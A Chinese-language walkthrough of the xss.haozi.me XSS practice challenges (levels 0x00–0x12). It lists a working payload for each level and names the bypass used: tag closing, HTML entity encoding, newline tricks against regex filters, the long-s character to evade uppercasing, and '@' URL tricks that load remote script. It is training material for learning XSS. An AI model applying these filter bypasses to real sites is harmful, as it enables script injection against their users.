xss.haozi.me通关攻略

测试浏览器：火狐浏览器

0x00

<script>alert(1)</script>

0x01

</textarea><script>alert(1)</script><textarea>

0x02

"><script>alert(1)</script>

0x03

题目过滤括号，可使用HTML实体编码绕过

<img src='x' onerror="alert&#40;1&#41;">

0x04

题目过滤括号，可使用HTML实体编码绕过

<img src='x' onerror="alert&#40;1&#41;">

0x05

闭合注释

--!><img src="x" onerror="alert(1)">

0x06

绕过正则，使用换行绕过 on.*=

type="image" src="xxx" onerror
="alert(1)"

0x07

img标签不闭合也能触发弹窗

<img src='x' onerror="alert(1)"

0x08

换行去绕过正则

</style
><script>alert(1)</script>

0x09

要求必须以一个固定的链接开头，在链接后闭合script并拼接img标签

https://www.segmentfault.com>"></script><img src='x' onerror=alert(1)>

0x0A

url后面拼接@符号

https://www.segmentfault.com@xss.haozi.me/j.js

0x0B

HTML实体编码绕过

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0C

HTML实体编码绕过

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0D

开头添加回车去绕过//注释

alert(1);
-->

0x0E

使用特殊的符号去绕过 toUpperCase()

<ſcript src="https://xss.haozi.me/j.js" ></script>

0x0F

使用//去注释掉后面的内容

');alert(1)//

0x10

</script><script>alert(1)

0x11

");alert(1);//

0x12

\");alert(1);//